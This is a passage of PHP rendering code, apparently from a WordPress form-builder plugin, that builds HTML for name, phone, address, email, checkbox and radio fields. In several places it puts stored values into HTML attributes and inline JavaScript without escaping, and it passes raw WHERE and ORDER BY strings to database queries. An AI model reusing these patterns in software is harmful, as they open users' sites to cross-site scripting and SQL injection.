                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");		
                
                $w_mini_labels = explode('***',$param['w_mini_labels']);
            
                $rep ='<div type="type_phone" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label" >'.$label.'</span>';
                
                $rep.='
                </div>
                <div class="wdform-element-section '.$param['w_class'].'" style="width: '.($param['w_size']+65).'px;">
                  <div style="display: table-cell;vertical-align: middle;">
                    <div><input type="text" class="" id="wdform_'.$id1.'_element_first'.$form_id.'" name="wdform_'.$id1.'_element_first'.$form_id.'" value="'.$element_value[0].'" style="width: 50px;" '.$param['attributes'].'></div>
                    <div><label class="mini_label">'.$w_mini_labels[0].'</label></div>
                  </div>
                  <div style="display: table-cell;vertical-align: middle;">
                    <div class="wdform_line" style="margin: 0px 4px 10px 4px; padding: 0px;">-</div>
                  </div>
                  <div style="display: table-cell;vertical-align: middle; width:100%;">
                    <div><input type="text" class="" id="wdform_'.$id1.'_element_last'.$form_id.'" name="wdform_'.$id1.'_element_last'.$form_id.'" value="'.$element_value[1].'" style="width: 100%;" '.$param['attributes'].'></div>
                    <div><label class="mini_label">'.$w_mini_labels[1].'</label></div>
                  </div>
                </div>
                </div>';

              break;
            }

            case 'type_name': {
            
              if($element_value =='')
                $element_value = '@@@';
              
               $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_first_val', 'w_title', 'w_mini_labels', 'w_size', 'w_name_format', 'w_required', 'w_unique', 'w_class');
               $temp = $params;
			   if(strpos($temp, 'w_name_fields') > -1)
				$params_names = array('w_field_label_size', 'w_field_label_pos', 'w_first_val', 'w_title', 'w_mini_labels', 'w_size', 'w_name_format', 'w_required', 'w_unique', 'w_class', 'w_name_fields');

                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }
                
                
                if($temp) {	
                  $temp	= explode('*:*w_attr_name*:*',$temp);
                  $attrs = array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' '.$attr;
                }
                
                $w_mini_labels = explode('***',$param['w_mini_labels']);
			    $param['w_name_fields'] = isset($param['w_name_fields']) ? $param['w_name_fields'] : ($param['w_name_format'] == 'normal' ? 'no***no' : 'yes***yes');
			    $w_name_fields = explode('***', $param['w_name_fields']);
                $element_value = explode('@@@', $element_value);
				
				if($w_name_fields[0]== 'no' && $w_name_fields[1]== 'no' ) {
					$w_name_format = '
						<div style="display: table-cell; width:50%">
						  <div><input type="text" class="" id="wdform_'.$id1.'_element_first'.$form_id.'" name="wdform_'.$id1.'_element_first'.$form_id.'" value="'.(count($element_value)==2 ? $element_value[0] : $element_value[1]).'" style="width: 100%;"'.$param['attributes'].'></div>
						  <div><label class="mini_label">'.$w_mini_labels[1].'</label></div>
						</div>
						<div style="display:table-cell;"><div style="margin: 0px 8px; padding: 0px;"></div></div>
						<div  style="display: table-cell; width:50%">
						  <div><input type="text" class="" id="wdform_'.$id1.'_element_last'.$form_id.'" name="wdform_'.$id1.'_element_last'.$form_id.'" value="'.(count($element_value)==2 ? $element_value[1] : $element_value[2]).'" style="width: 100%;" '.$param['attributes'].'></div>
						  <div><label class="mini_label">'.$w_mini_labels[2].'</label></div>
						</div>
						';
					$w_size=2*$param['w_size'];
				 }
				else {
					$first_last_size = $w_name_fields[0] == 'yes' && $w_name_fields[1] == 'no' ? 45 : 30;
					$w_name_format = '
						<div style="display: table-cell; width:30%">
						  <div><input type="text" class="" id="wdform_'.$id1.'_element_first'.$form_id.'" name="wdform_'.$id1.'_element_first'.$form_id.'" value="'.(count($element_value)==2 ? $element_value[0] : $element_value[1]).'" style="width:100%;"></div>
						  <div><label class="mini_label">'.$w_mini_labels[1].'</label></div>
						</div>
						<div style="display:table-cell;"><div style="margin: 0px 4px; padding: 0px;"></div></div>
						<div style="display: table-cell; width:30%">
						  <div><input type="text" class="" id="wdform_'.$id1.'_element_last'.$form_id.'" name="wdform_'.$id1.'_element_last'.$form_id.'" value="'.(count($element_value)==2 ? $element_value[1] : $element_value[2]).'" style="width:  100%;"></div>
						  <div><label class="mini_label">'.$w_mini_labels[2].'</label></div>
						</div>';
					$w_size = 2*$param['w_size'];
					
					if($w_name_fields[0] == 'yes') {
						$w_name_format = '
							<div style="display: table-cell;">
							  <div><input type="text" class="" id="wdform_'.$id1.'_element_title'.$form_id.'" name="wdform_'.$id1.'_element_title'.$form_id.'" value="'.(count($element_value)==2 ? "" : $element_value[0]).'" style="width: 40px;"></div>
							  <div><label class="mini_label">'.$w_mini_labels[0].'</label></div>
							</div>
							<div style="display:table-cell;"><div style="margin: 0px 1px; padding: 0px;"></div></div>'.$w_name_format;
						$w_size	+= 80;
					}
					if($w_name_fields[1] == 'yes') {
						$w_name_format = $w_name_format.'
							<div style="display:table-cell;"><div style="margin: 0px 4px; padding: 0px;"></div></div>
							<div style="display: table-cell; width:30%">
							  <div><input type="text" class="" id="wdform_'.$id1.'_element_middle'.$form_id.'" name="wdform_'.$id1.'_element_middle'.$form_id.'" value="'.(count($element_value)==2 ? "" : $element_value[3]).'"style="width: 100%;"></div>
							  <div><label class="mini_label">'.$w_mini_labels[3].'</label></div>
							</div>						
							';
						$w_size	+= $param['w_size'];		
					}		
				}
				
                $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$w_size) : max($param['w_field_label_size'],$w_size));	
                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	

                $rep ='<div type="type_name" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                
                $rep.='</div>
                <div class="wdform-element-section '.$param['w_class'].'" style="width: '.$w_size.'px;">'.$w_name_format.'</div></div>';
        
              break;
            }
            
            case 'type_address': {
              $params_names = array('w_field_label_size','w_field_label_pos','w_size','w_mini_labels','w_disabled_fields','w_required','w_class');
              $temp = $params;
              foreach($params_names as $params_name ) {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }
              
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
              
              $w_mini_labels = explode('***',$param['w_mini_labels']);
              $w_disabled_fields = explode('***',$param['w_disabled_fields']);
            
              $rep ='<div type="type_address" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';		
          
              $address_fields ='';
              $g=0;
              if (isset($w_disabled_fields[0]) && $w_disabled_fields[0]=='no') {
                  $g+=2;
                  $address_fields .= '<span style="float: left; width: 100%; padding-bottom: 8px; display: block;"><input type="text" id="wdform_'.$id1.'_street1'.$form_id.'" name="wdform_'.$id1.'_street1'.$form_id.'" value="'.$elements_of_address[0].'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label" >'.$w_mini_labels[0].'</label></span>';
              }
              if (isset($w_disabled_fields[1]) && $w_disabled_fields[1]=='no') {
                $g+=2;
                $address_fields .= '<span style="float: left; width: 100%; padding-bottom: 8px; display: block;"><input type="text" id="wdform_'.$id1.'_street2'.$form_id.'" name="wdform_'.($id1+1).'_street2'.$form_id.'" value="'.$elements_of_address[1].'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label" >'.$w_mini_labels[1].'</label></span>';
              }
              if (isset($w_disabled_fields[2]) && $w_disabled_fields[2]=='no') {
                $g++;
                $address_fields .= '<span style="float: left; width: 48%; padding-bottom: 8px;"><input type="text" id="wdform_'.$id1.'_city'.$form_id.'" name="wdform_'.($id1+2).'_city'.$form_id.'" value="'.$elements_of_address[2].'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label" >'.$w_mini_labels[2].'</label></span>';
              }
              if (isset($w_disabled_fields[3]) && $w_disabled_fields[3]=='no') {
                $g++;												
                $w_states = array("","Alabama","Alaska", "Arizona","Arkansas","California","Colorado","Connecticut","Delaware","District Of Columbia","Florida","Georgia","Hawaii","Idaho","Illinois","Indiana","Iowa","Kansas","Kentucky","Louisiana","Maine","Maryland","Massachusetts","Michigan","Minnesota","Mississippi","Missouri","Montana","Nebraska","Nevada","New Hampshire","New Jersey","New Mexico","New York","North Carolina","North Dakota","Ohio","Oklahoma","Oregon","Pennsylvania","Rhode Island","South Carolina","South Dakota","Tennessee","Texas","Utah","Vermont","Virginia","Washington","West Virginia","Wisconsin","Wyoming");	
                $w_state_options = '';
                foreach($w_states as $w_state) {						
                  if($w_state == $elements_of_address[3])					
                    $selected = 'selected=\"selected\"';
                  else
                    $selected = '';
                  $w_state_options .= '<option value="'.$w_state.'" '.$selected.'>'.$w_state.'</option>';
                }
                if(isset($w_disabled_fields[5]) && $w_disabled_fields[5]=='yes' && isset($w_disabled_fields[6]) && $w_disabled_fields[6]=='yes') {
                  $address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><select type="text" id="wdform_'.$id1.'_state'.$form_id.'" name="wdform_'.($id1+3).'_state'.$form_id.'" style="width: 100%;" '.$param['attributes'].'>'.$w_state_options.'</select><label class="mini_label" style="display: block;" id="'.$id1.'_mini_label_state">'.$w_mini_labels[3].'</label></span>';
                }
                else
                  $address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><input type="text" id="wdform_'.$id1.'_state'.$form_id.'" name="wdform_'.($id1+3).'_state'.$form_id.'" value="'.$elements_of_address[3].'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label">'.$w_mini_labels[3].'</label></span>';
              }
              if (isset($w_disabled_fields[4]) && $w_disabled_fields[4]=='no') {
                $g++;
                $address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><input type="text" id="wdform_'.$id1.'_postal'.$form_id.'" name="wdform_'.($id1+4).'_postal'.$form_id.'" value="'.$elements_of_address[4].'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label">'.$w_mini_labels[4].'</label></span>';
              }
              $w_countries = array("","Afghanistan","Albania","Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombia","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepal","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe");	
              $w_options = '';
              foreach($w_countries as $w_country) {
                if($w_country == $elements_of_address[5])					
                  $selected = 'selected="selected"';
                else
                  $selected = '';
                $w_options .= '<option value="'.$w_country.'" '.$selected.'>'.$w_country.'</option>';
              }
            
              if (isset($w_disabled_fields[5]) && $w_disabled_fields[5]=='no') {
                $g++;
                $address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;display: inline-block;"><select type="text" id="wdform_'.$id1.'_country'.$form_id.'" name="wdform_'.($id1+5).'_country'.$form_id.'" style="width:100%" '.$param['attributes'].'>'.$w_options.'</select><label class="mini_label">'.$w_mini_labels[5].'</span>';
              }				

            
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="width: '.$param['w_size'].'px;"><div>
              '.$address_fields.'</div></div></div>';	
              break;
            }

            case 'type_submitter_mail': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required','w_unique', 'w_class');
              $temp=$params;

              foreach($params_names as $params_name ) {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              
              
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }
              
              
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
              
              $rep ='<div type="type_submitter_mail" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="width: '.$param['w_size'].'px;"><input type="text" class="" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$element_value.'" title="'.$param['w_title'].'"  style="width: 100%;" '.$param['attributes'].'></div></div>';
              
            
              
              break;
            }

            case 'type_checkbox':

					{

					

						$params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');

						$temp=$params;

						if(strpos($temp, 'w_field_option_pos') > -1)

							$params_names=array('w_field_label_size','w_field_label_pos','w_field_option_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_value_disabled','w_choices_value', 'w_choices_params', 'w_class');

							

						foreach($params_names as $params_name )

						{	

							$temp=explode('*:*'.$params_name.'*:*',$temp);

							$param[$params_name] = $temp[0];

							$temp=$temp[1];

						}

						

						if($temp)

						{	

							$temp	=explode('*:*w_attr_name*:*',$temp);

							$attrs	= array_slice($temp,0, count($temp)-1);   

							foreach($attrs as $attr)

								$param['attributes'] = $param['attributes'].' '.$attr;

						}

						

						$param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	

						if(!isset($param['w_value_disabled']))

						$param['w_value_disabled'] = 'no';

						

						if(!isset($param['w_field_option_pos']))

						$param['w_field_option_pos'] = 'left';

						

						$param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none !important;'" : "");

						$param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin-right: 8px !important; display: inline-block !important;'" : "");	

						

						$param['w_choices']	= explode('***',$param['w_choices']);

						if(isset($param['w_choices_value']))

						{

							$param['w_choices_value'] = explode('***',$param['w_choices_value']);

							$param['w_choices_params'] = explode('***',$param['w_choices_params']);	

						}

						

						$element_value	= explode('***br***',$element_value);

						$element_value 	= array_slice($element_value,0, count($element_value)-1); 

						$is_other=false;

						$other_value = '';



						foreach($element_value as $key => $value)

						{

							if(!in_array($value, ($param['w_value_disabled']=='no' ? $param['w_choices'] : (isset($param['w_choices_value']) ? $param['w_choices_value'] : array()))))

							{

								$other_value = $value;

								$is_other=true;

								break;

							}

						}



						$rep='<div type="type_checkbox" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';

						

						$rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';">';

					

						$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).'; vertical-align:top">';

						$total_queries = 0;

						foreach($param['w_choices'] as $key => $choice)

						{	

							$key1 = $key + $total_queries;

							if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])

							{	

							$choices_labels =array();
							$choices_values = array();

							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
						
		

								$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));

								$table = $label_table_and_column[0];

								$label_column = $label_table_and_column[1];

								if($label_column)

								{
								$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);					

								}	



								$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_value'][$key]));

								$value_column = $value_table_and_column[1];



								if($value_column)

								{
								$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);

								}		

								$columns_count_checkbox = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);

								

								if(array_filter($choices_labels) || array_filter($choices_values))

								{

									$total_queries = $total_queries + $columns_count_checkbox-1;

									

									if(!isset($post_value))

										$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');

										

									for($k=0; $k<$columns_count_checkbox; $k++)

									{

										$choice_label = isset($choices_labels[$k]) ? $choices_labels[$k] : '';

										$choice_value = isset($choices_values[$k]) ? $choices_values[$k] : $choice_label;

										if(($key1+$k)%$param['w_rowcol']==0 && ($key1+$k)>0)

											$rep.='</div><div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';  vertical-align:top">';

										

										$checked=(in_array($choice_value, $element_value) ? 'checked="checked"' : '');

										

										$rep.='<div style="display: '.($param['w_flow']!='hor' ? 'table-cell' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" '.$param['w_field_option_pos1'].'>'.$choice_label.'</label><div class="checkbox-div forlabs" '.$param['w_field_option_pos2'].'><input type="checkbox" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'other="1"' : ''	).' id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" value="'.htmlspecialchars($choice_value).'" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'onclick="if(set_checked(&quot;wdform_'.$id1.'&quot;,&quot;'.($key1+$k).'&quot;,&quot;'.$form_id.'&quot;)) show_other_input(&quot;wdform_'.$id1.'&quot;,&quot;'.$form_id.'&quot;);"' : '').' '.$param['attributes'].' '.$checked.'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div></div>';

										

									}

								}	

							}	

							else

							{

								if($key1%$param['w_rowcol']==0 && $key1>0)

									$rep.='</div><div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';  vertical-align:top">';

									

								$checked=(in_array($choice, $element_value) ? 'checked="checked"' : '');

								

								if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key && $is_other)

									$checked = 'checked="checked"';	

									

								

								$rep.='<div style="display: '.($param['w_flow']!='hor' ? 'table-cell' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'" '.$param['w_field_option_pos1'].'>'.$choice.'</label><div class="checkbox-div forlabs" '.$param['w_field_option_pos2'].'><input type="checkbox" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'other="1"' : ''	).' id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.''.$key1.'" value="'.htmlspecialchars($choice).'" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'onclick="if(set_checked(&quot;wdform_'.$id1.'&quot;,&quot;'.$key1.'&quot;,&quot;'.$form_id.'&quot;)) show_other_input(&quot;wdform_'.$id1.'&quot;,&quot;'.$form_id.'&quot;);"' : '').' '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div></div>';

								

								$param['w_allow_other_num'] = $param['w_allow_other_num']==$key ? $key1 : $param['w_allow_other_num'];

							}	

						}

						$rep.='</div>';



						$rep.='</div></div>';

						

						

						if($is_other)

							$onload_js .='show_other_input("wdform_'.$id1.'","'.$form_id.'"); jQuery("#wdform_'.$id1.'_other_input'.$form_id.'").val("'.$other_value.'");';

						

						$onsubmit_js.='

							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_allow_other'.$form_id.'\" value = \"'.$param['w_allow_other'].'\" />").appendTo("#adminForm");

							jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_allow_other_num'.$form_id.'\" value = \"'.$param['w_allow_other_num'].'\" />").appendTo("#adminForm");

							';

							

						break;

					}

            case 'type_radio':

					{

					

						

						$params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');

						$temp=$params;

						if(strpos($temp, 'w_field_option_pos') > -1)

						$params_names=array('w_field_label_size','w_field_label_pos','w_field_option_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num','w_value_disabled','w_choices_value', 'w_choices_params','w_class');

						

						foreach($params_names as $params_name )

						{	

							$temp=explode('*:*'.$params_name.'*:*',$temp);

							$param[$params_name] = $temp[0];

							$temp=$temp[1];

						}

						

						if($temp)

						{	

							$temp	=explode('*:*w_attr_name*:*',$temp);

							$attrs	= array_slice($temp,0, count($temp)-1);   

							foreach($attrs as $attr)

								$param['attributes'] = $param['attributes'].' '.$attr;

						}

						if(!isset($param['w_value_disabled']))

							$param['w_value_disabled'] = 'no';

					

						if(!isset($param['w_field_option_pos']))

							$param['w_field_option_pos'] = 'left';

						

						$param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	

						$param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none !important;'" : "");

						$param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin-right: 8px !important; display: inline-block !important;'" : "");

					

						$param['w_choices']	= explode('***',$param['w_choices']);

						if(isset($param['w_choices_value']))

						{

							$param['w_choices_value'] = explode('***',$param['w_choices_value']);

							$param['w_choices_params'] = explode('***',$param['w_choices_params']);	

						}

						

						$is_other=true;



						foreach($param['w_choices'] as $key => $choice)

						{

							$choice_value = isset($param['w_choices_value']) ? $param['w_choices_value'][$key] : $choice;	

							if($choice_value==$element_value)

							{

								$is_other=false;

								break;

							}

						}	

											

						$rep='<div type="type_radio" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';

						

						$rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].';">';

					

						$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).'; vertical-align:top">';

						$total_queries =0;

						foreach($param['w_choices'] as $key => $choice)

						{	

							$key1 = $key + $total_queries;

							if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])

							{	

								$choices_labels =array();	
							$choices_values =array();	
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
	
								$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));

								$table = $label_table_and_column[0];

								$label_column = $label_table_and_column[1];

								if($label_column) {
									$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);
								}



								$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_value'][$key]));

								$value_column = $value_table_and_column[1];



								if($value_column) {
                  $choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);
								}	

								

								$columns_count_radio = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);

								if(array_filter($choices_labels) || array_filter($choices_values))

								{

									$total_queries = $total_queries + $columns_count_radio-1;

				

									for($k=0; $k<$columns_count_radio; $k++)

									{

										$choice_label = isset($choices_labels[$k]) ? $choices_labels[$k] : '';

										$choice_value = isset($choices_values[$k]) ? $choices_values[$k] : $choice_label;

											

										if(($key1+$k)%$param['w_rowcol']==0 && ($key1+$k)>0)

											$rep.='</div><div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';  vertical-align:top">';



										$checked =($choice_value==$element_value ? 'checked="checked"' : '');

										if($choice_value==$element_value)

											$is_other=false;

										

										$rep.='<div style="display: '.($param['w_flow']!='hor' ? 'table-cell' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" '.$param['w_field_option_pos1'].'>'.$choice_label.'</label><div class="radio-div forlabs" '.$param['w_field_option_pos2'].'><input type="radio" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'other="1"' : ''	).' id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.htmlspecialchars($choice_value).'" onclick="set_default(&quot;wdform_'.$id1.'&quot;,&quot;'.($key1+$k).'&quot;,&quot;'.$form_id.'&quot;); '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'show_other_input(&quot;wdform_'.$id1.'&quot;,&quot;'.$form_id.'&quot;);' : '').'" '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div></div>';

					

									}

								}	

							}	

							else

							{

								if($key1%$param['w_rowcol']==0 && $key1>0)

									$rep.='</div><div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';  vertical-align:top">';

								

								$checked =($choice==$element_value ? 'checked="checked"' : '');

								if($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key && $is_other==true && $element_value!='')

									$checked = 'checked="checked"';

								$choice_value = isset($param['w_choices_value']) ? $param['w_choices_value'][$key] : $choice;

								

								$rep.='<div style="display: '.($param['w_flow']!='hor' ? 'table-cell' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'" '.$param['w_field_option_pos1'].'>'.$choice.'</label><div class="radio-div forlabs" '.$param['w_field_option_pos2'].'><input type="radio" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'other="1"' : ''	).' id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.htmlspecialchars($choice_value).'" onclick="set_default(&quot;wdform_'.$id1.'&quot;,&quot;'.$key1.'&quot;,&quot;'.$form_id.'&quot;); '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'show_other_input(&quot;wdform_'.$id1.'&quot;,&quot;'.$form_id.'&quot;);' : '').'" '.$checked.' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div></div>';

								

								$param['w_allow_other_num'] = $param['w_allow_other_num']==$key ? $key1 : $param['w_allow_other_num'];

							}	

						}

								$rep.='</div>';



						$rep.='</div></div>';

					

						

						if($is_other && $element_value!='') 

							$onload_js .='show_other_input("wdform_'.$id1.'","'.$form_id.'"); jQuery("#wdform_'.$id1.'_other_input'.$form_id.'").val("'.$element_value.'");';

						

						$onsubmit_js.='

